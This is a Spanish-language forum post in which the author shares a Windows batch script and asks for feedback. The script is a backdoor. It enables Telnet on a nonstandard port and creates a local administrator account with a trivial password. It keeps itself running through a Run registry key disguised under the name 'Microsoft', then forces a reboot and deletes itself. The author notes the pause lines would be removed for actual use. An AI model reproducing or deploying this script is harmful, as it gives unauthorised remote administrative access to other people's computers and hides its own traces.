Buenas comunidad, voy a dejar aqui un batch que hize, se encarga de habilitar el servicio telnet asi como crear un usuario administrador para poder hacer una conexion remota por telnet, se puede cambiar el puerto y registrar en el inicio de windows a otro batch creado por el primero con los comandos que nos interesan, asi que me gustaria saber que opinan.........
no le puse comentarios ni nada primero me gustaria que lo evaluen

@echo off
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f
pause
net user nombre pass /add
net localgroup "Administradores" nombre /add
pause
echo @echo off>>%windir%\system32\yo.bat
echo REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f>>%windir%\system32\yo.bat
echo REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Microsoft /t REG_SZ /d %windir%\system32\yo.bat /f>>%windir%\system32\yo.bat
echo net user nombre pass /add>>%windir%\system32\yo.bat
echo net localgroup "Administradores" nombre /add>>%windir%\system32\yo.bat
echo tlntadmn config port = 115>>%windir%\system32\yo.bat
echo exit>>%windir%\system32\yo.bat
pause
shutdown -r -t 00 -f -c "reiniciamos para efectuar cambios"
del %0
exit
Una cosa mas tengo un manual para configurar este servidor telnet en windows manualmente, donde puedo postearlo para que lo vean........
Me olvide decir que puse los pause para que vean que cada comando se ejecuta correctamente, al final para usar el bat lo sacamos estos pause je je!!